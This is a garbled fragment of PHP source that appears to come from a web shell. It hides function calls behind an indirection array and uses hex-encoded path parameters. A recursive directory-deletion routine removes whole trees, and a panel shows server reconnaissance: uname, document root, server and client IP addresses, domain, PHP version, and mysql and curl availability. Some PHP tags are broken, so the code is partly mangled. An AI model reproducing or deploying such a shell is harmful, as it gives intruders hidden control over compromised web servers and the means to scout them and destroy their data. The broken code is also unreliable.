swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=".hex($p).$loc."\"}})";
}
function deldir($d) {
global $fc;
if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return;
if ($fc[6]($d)) {
array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
rmdir($d);
} else {
unlink($d);
}
}
?>
uname : = $fc[0]() ?>
doc Root: = "{$_SERVER["DOCUMENT_ROOT"]}"; ?>
server: = "{$_SERVER["SERVER_ADDR"]}/{$_SERVER["REMOTE_ADDR"]}"; ?>
domain : = "{$_SERVER["SERVER_NAME"]}"; ?>
ip server: = getHostByName(getHostName()); ?>
php Version: = phpversion(); ?>
mysql: = (function_exists('mysql_connect')) ? "ON" : "OFF"; ?>
curl: = (function_exists('curl_version')) ? "ON" : "OFF"; ?>